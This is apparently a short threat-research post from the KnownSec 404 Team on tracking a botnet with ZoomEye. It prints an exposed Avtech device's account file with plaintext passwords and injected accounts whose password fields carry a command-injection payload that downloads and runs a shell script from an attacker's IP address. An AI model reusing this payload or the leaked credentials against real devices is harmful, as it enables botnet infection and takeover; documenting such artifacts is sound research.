A case of tracking botnet using ZoomEye

HTTP/1.1 200 OK
Date: Thu, 04 Jul 2019 16:11:40 GMT
Server: Linux/2.x UPnP/1.0 Avtech/1.0
Connection: close
Last-Modified: Wed, 26 Jun 2019 13:07:09 GMT
Content-Type: text/plain
ETag: 37-2410-1561554429
Content-Length: 2410

<Account>
<Maxuser Level="40/40">10</Maxuser>
<LocalPassword Level="40/40">0000</LocalPassword>
<OperatorPassword Level="40/40">0000</OperatorPassword>
<AnonymousLogin Level="40/40" Dispatch="account">DISABLE</AnonymousLogin>
<AdvenceUserLevel Level="40/40">OFF</AdvenceUserLevel>
<User1>
<Username Level="40/40">admin</Username>
<Password Level="40/40">260879jimi</Password>
<Level Level="40/40">SUPERVISOR</Level>
<Lifetime Level="40/40">INFINITE</Lifetime>
<PhoneNum1 Level="40/40" />
<PhoneNum2 Level="40/40" />
<PhoneNum3 Level="40/40" />
<IDCode Level="" />
</User1>
<User2>
<Username Level="40/40" Dispatch="account">eddy</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User2>
<User3>
<Username Level="40/40" Dispatch="account">user</Username>
<Password Level="40/40" Dispatch="account">123456</Password>
<Level Level="40/40" Dispatch="account">POWER USER</Level>
<Lifetime Level="40/40" Dispatch="account">INFINITE</Lifetime>
</User3>
<User4>
<Username Level="40/40" Dispatch="account">maxposts</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User4>
<User5>
<Username Level="40/40" Dispatch="account">qmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User5>
<User6>
<Username Level="40/40" Dispatch="account">xqmcxcfk</Username>
<Password Level="40/40" Dispatch="account">;cd /tmp;wget http://222.186.52.155:21541/sh/AV.sh -O AV.sh;chmod 777 AV.sh;sh AV.sh;</Password>
<Level Level="40/40" Dispatch="account">SUPERVISOR</Level>
<Lifetime Level="40/40" Dispatch="account">5 MIN</Lifetime>
</User6>
</Account>

The Leader of the KnownSec 404 Team ( ZoomEye http://www.zoomeye.org SeeBug http://www.seebug.org KCon http://kcon.knownsec.com)

heige
